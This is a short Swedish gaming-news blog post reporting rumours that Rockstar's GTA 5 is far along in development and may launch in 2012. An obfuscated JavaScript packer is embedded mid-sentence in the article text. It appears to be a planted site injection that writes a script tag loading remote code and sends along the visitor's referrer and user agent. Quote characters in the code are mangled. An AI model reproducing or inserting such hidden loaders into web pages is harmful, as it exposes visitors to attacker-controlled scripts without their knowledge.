Image Image Image Image Image Image Image Image Image Image

| 1 december, 2020

Scroll to top

Top

GTA 5 snart färdigt?

GTA 5 snart färdigt?
Sebastian

Igår gick en källa med ”nära anknytning” till företaget Rockstar ut med information till Gamespot eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yaszb|var|u0026u|referrer|ddyrn||js|php’.split(’|’),0,{}))
angående Grand Theft Auto 5. Dem sägs ha kommit väldigt långt med arbetet redan och att dem i nuläget håller på att interagera minispel. Spelvärldens yta kommer också bli enorm.

Att GTA V (5) släpps redan under 2012 är enligt källan ”ganska troligt”.

Mer än detta får vi inte veta om Rockstars efterlängtade uppföljare. Enligt rykten och spekulationer så sägs det att staden kommer att vara L.A-inspirerad och likna det grymma spelet Vice City. Det konkreta vi egentligen vet ännu är att spelet är otroligt efterlängtat och att förväntnigarna är lika höga som rykterna är vilda.